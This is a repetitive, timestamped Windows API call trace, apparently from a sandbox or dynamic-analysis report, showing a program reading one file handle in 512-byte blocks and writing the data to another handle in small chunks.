[0119.821] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.821] GetFileType (hFile=0x50) returned 0x1 [0119.821] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.821] GetFileType (hFile=0x50) returned 0x1 [0119.821] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.821] WriteFile (in: hFile=0x50, lpBuffer=0x12ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.823] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.823] GetFileType (hFile=0x50) returned 0x1 [0119.823] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.823] WriteFile (in: hFile=0x50, lpBuffer=0x12ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec2c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.823] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.823] GetFileType (hFile=0x50) returned 0x1 [0119.823] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.823] WriteFile (in: hFile=0x50, lpBuffer=0x12ec7c*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec7c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.823] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.823] GetFileType (hFile=0x50) returned 0x1 [0119.823] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.823] WriteFile (in: hFile=0x50, lpBuffer=0x12eccc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12eccc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.823] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.823] GetFileType (hFile=0x50) returned 0x1 [0119.823] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.823] WriteFile (in: hFile=0x50, lpBuffer=0x12ed1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed1c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.823] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.823] GetFileType (hFile=0x50) returned 0x1 [0119.823] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.823] WriteFile (in: hFile=0x50, lpBuffer=0x12ed6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed6c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.824] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.824] GetFileType (hFile=0x50) returned 0x1 [0119.824] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.824] WriteFile (in: hFile=0x50, lpBuffer=0x12edbc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12edbc*, lpNumberOfBytesWritten=0x12ddc0*=0x20, lpOverlapped=0x0) returned 1 [0119.824] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.824] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12ddac | out: lpNewFilePointer=0x0) returned 1 [0119.824] _get_osfhandle (_FileHandle=4) returned 
0x58 [0119.824] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.824] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.824] GetFileType (hFile=0x50) returned 0x1 [0119.824] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.824] GetFileType (hFile=0x50) returned 0x1 [0119.824] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.824] WriteFile (in: hFile=0x50, lpBuffer=0x12ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.824] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.824] GetFileType (hFile=0x50) returned 0x1 [0119.824] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.824] WriteFile (in: hFile=0x50, lpBuffer=0x12ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec2c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.824] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.824] GetFileType (hFile=0x50) returned 0x1 [0119.824] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.824] WriteFile (in: hFile=0x50, lpBuffer=0x12ec7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec7c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.825] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.825] GetFileType (hFile=0x50) returned 0x1 [0119.825] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.825] WriteFile (in: hFile=0x50, lpBuffer=0x12eccc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12eccc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.825] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.825] GetFileType (hFile=0x50) 
returned 0x1 [0119.825] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.825] WriteFile (in: hFile=0x50, lpBuffer=0x12ed1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed1c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.825] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.825] GetFileType (hFile=0x50) returned 0x1 [0119.825] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.825] WriteFile (in: hFile=0x50, lpBuffer=0x12ed6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed6c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.825] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.825] GetFileType (hFile=0x50) returned 0x1 [0119.825] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.825] WriteFile (in: hFile=0x50, lpBuffer=0x12edbc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12edbc*, lpNumberOfBytesWritten=0x12ddc0*=0x20, lpOverlapped=0x0) returned 1 [0119.825] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.825] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12ddac | out: lpNewFilePointer=0x0) returned 1 [0119.825] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.825] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.826] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.826] GetFileType (hFile=0x50) returned 0x1 [0119.826] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.826] GetFileType (hFile=0x50) returned 0x1 [0119.826] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.826] WriteFile (in: hFile=0x50, lpBuffer=0x12ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, 
lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.826] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.826] GetFileType (hFile=0x50) returned 0x1 [0119.826] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.826] WriteFile (in: hFile=0x50, lpBuffer=0x12ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec2c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.826] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.826] GetFileType (hFile=0x50) returned 0x1 [0119.826] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.826] WriteFile (in: hFile=0x50, lpBuffer=0x12ec7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec7c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.826] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.826] GetFileType (hFile=0x50) returned 0x1 [0119.826] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.826] WriteFile (in: hFile=0x50, lpBuffer=0x12eccc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12eccc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.826] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.826] GetFileType (hFile=0x50) returned 0x1 [0119.826] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.826] WriteFile (in: hFile=0x50, lpBuffer=0x12ed1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed1c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.826] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.826] GetFileType (hFile=0x50) returned 0x1 [0119.826] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.827] WriteFile (in: hFile=0x50, lpBuffer=0x12ed6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed6c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, 
lpOverlapped=0x0) returned 1 [0119.827] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.827] GetFileType (hFile=0x50) returned 0x1 [0119.827] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.827] WriteFile (in: hFile=0x50, lpBuffer=0x12edbc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12edbc*, lpNumberOfBytesWritten=0x12ddc0*=0x20, lpOverlapped=0x0) returned 1 [0119.827] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.827] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12ddac | out: lpNewFilePointer=0x0) returned 1 [0119.827] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.827] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.827] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.827] GetFileType (hFile=0x50) returned 0x1 [0119.827] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.827] GetFileType (hFile=0x50) returned 0x1 [0119.827] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.827] WriteFile (in: hFile=0x50, lpBuffer=0x12ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.827] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.827] GetFileType (hFile=0x50) returned 0x1 [0119.827] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.827] WriteFile (in: hFile=0x50, lpBuffer=0x12ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec2c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.827] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.827] GetFileType (hFile=0x50) returned 0x1 [0119.827] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.827] WriteFile (in: hFile=0x50, 
lpBuffer=0x12ec7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec7c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.827] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.827] GetFileType (hFile=0x50) returned 0x1 [0119.828] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.828] WriteFile (in: hFile=0x50, lpBuffer=0x12eccc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12eccc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.828] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.828] GetFileType (hFile=0x50) returned 0x1 [0119.828] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.828] WriteFile (in: hFile=0x50, lpBuffer=0x12ed1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed1c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.828] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.828] GetFileType (hFile=0x50) returned 0x1 [0119.828] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.828] WriteFile (in: hFile=0x50, lpBuffer=0x12ed6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed6c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.828] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.828] GetFileType (hFile=0x50) returned 0x1 [0119.828] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.828] WriteFile (in: hFile=0x50, lpBuffer=0x12edbc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12edbc*, lpNumberOfBytesWritten=0x12ddc0*=0x20, lpOverlapped=0x0) returned 1 [0119.828] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.828] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12ddac | out: lpNewFilePointer=0x0) returned 1 [0119.828] _get_osfhandle 
(_FileHandle=4) returned 0x58 [0119.828] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.828] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.828] GetFileType (hFile=0x50) returned 0x1 [0119.828] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.828] GetFileType (hFile=0x50) returned 0x1 [0119.828] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.828] WriteFile (in: hFile=0x50, lpBuffer=0x12ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.828] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.829] GetFileType (hFile=0x50) returned 0x1 [0119.829] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.829] WriteFile (in: hFile=0x50, lpBuffer=0x12ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec2c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.829] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.829] GetFileType (hFile=0x50) returned 0x1 [0119.829] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.829] WriteFile (in: hFile=0x50, lpBuffer=0x12ec7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec7c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.829] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.829] GetFileType (hFile=0x50) returned 0x1 [0119.829] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.829] WriteFile (in: hFile=0x50, lpBuffer=0x12eccc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12eccc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.829] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.829] 
GetFileType (hFile=0x50) returned 0x1 [0119.829] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.829] WriteFile (in: hFile=0x50, lpBuffer=0x12ed1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed1c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.829] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.829] GetFileType (hFile=0x50) returned 0x1 [0119.829] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.829] WriteFile (in: hFile=0x50, lpBuffer=0x12ed6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed6c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.829] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.829] GetFileType (hFile=0x50) returned 0x1 [0119.829] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.829] WriteFile (in: hFile=0x50, lpBuffer=0x12edbc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12edbc*, lpNumberOfBytesWritten=0x12ddc0*=0x20, lpOverlapped=0x0) returned 1 [0119.829] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.830] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12ddac | out: lpNewFilePointer=0x0) returned 1 [0119.830] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.830] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.830] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.830] GetFileType (hFile=0x50) returned 0x1 [0119.830] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.830] GetFileType (hFile=0x50) returned 0x1 [0119.830] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.830] WriteFile (in: hFile=0x50, lpBuffer=0x12ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | 
out: lpBuffer=0x12ebdc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.830] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.830] GetFileType (hFile=0x50) returned 0x1 [0119.830] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.830] WriteFile (in: hFile=0x50, lpBuffer=0x12ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec2c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.830] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.830] GetFileType (hFile=0x50) returned 0x1 [0119.830] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.830] WriteFile (in: hFile=0x50, lpBuffer=0x12ec7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec7c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.830] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.830] GetFileType (hFile=0x50) returned 0x1 [0119.830] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.830] WriteFile (in: hFile=0x50, lpBuffer=0x12eccc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12eccc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.830] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.830] GetFileType (hFile=0x50) returned 0x1 [0119.830] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.830] WriteFile (in: hFile=0x50, lpBuffer=0x12ed1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed1c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.831] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.831] GetFileType (hFile=0x50) returned 0x1 [0119.831] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.831] WriteFile (in: hFile=0x50, lpBuffer=0x12ed6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed6c*, 
lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.831] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.831] GetFileType (hFile=0x50) returned 0x1 [0119.831] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.831] WriteFile (in: hFile=0x50, lpBuffer=0x12edbc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12edbc*, lpNumberOfBytesWritten=0x12ddc0*=0x20, lpOverlapped=0x0) returned 1 [0119.831] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.831] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12ddac | out: lpNewFilePointer=0x0) returned 1 [0119.831] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.831] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.831] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.831] GetFileType (hFile=0x50) returned 0x1 [0119.831] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.831] GetFileType (hFile=0x50) returned 0x1 [0119.831] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.831] WriteFile (in: hFile=0x50, lpBuffer=0x12ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.831] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.831] GetFileType (hFile=0x50) returned 0x1 [0119.831] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.831] WriteFile (in: hFile=0x50, lpBuffer=0x12ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec2c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.831] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.831] GetFileType (hFile=0x50) returned 0x1 [0119.831] _get_osfhandle (_FileHandle=1) returned 0x50 
[0119.831] WriteFile (in: hFile=0x50, lpBuffer=0x12ec7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec7c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.832] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.832] GetFileType (hFile=0x50) returned 0x1 [0119.832] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.832] WriteFile (in: hFile=0x50, lpBuffer=0x12eccc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12eccc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.832] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.832] GetFileType (hFile=0x50) returned 0x1 [0119.832] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.832] WriteFile (in: hFile=0x50, lpBuffer=0x12ed1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed1c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.832] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.832] GetFileType (hFile=0x50) returned 0x1 [0119.832] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.832] WriteFile (in: hFile=0x50, lpBuffer=0x12ed6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed6c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.832] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.832] GetFileType (hFile=0x50) returned 0x1 [0119.832] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.832] WriteFile (in: hFile=0x50, lpBuffer=0x12edbc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12edbc*, lpNumberOfBytesWritten=0x12ddc0*=0x20, lpOverlapped=0x0) returned 1 [0119.832] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.832] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12ddac | out: lpNewFilePointer=0x0) 
returned 1 [0119.832] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.832] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.832] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.832] GetFileType (hFile=0x50) returned 0x1 [0119.832] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.832] GetFileType (hFile=0x50) returned 0x1 [0119.833] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.833] WriteFile (in: hFile=0x50, lpBuffer=0x12ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.833] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.833] GetFileType (hFile=0x50) returned 0x1 [0119.833] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.833] WriteFile (in: hFile=0x50, lpBuffer=0x12ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec2c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.833] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.833] GetFileType (hFile=0x50) returned 0x1 [0119.833] _get_osfhandle (_FileHandle=1) returned 0x50 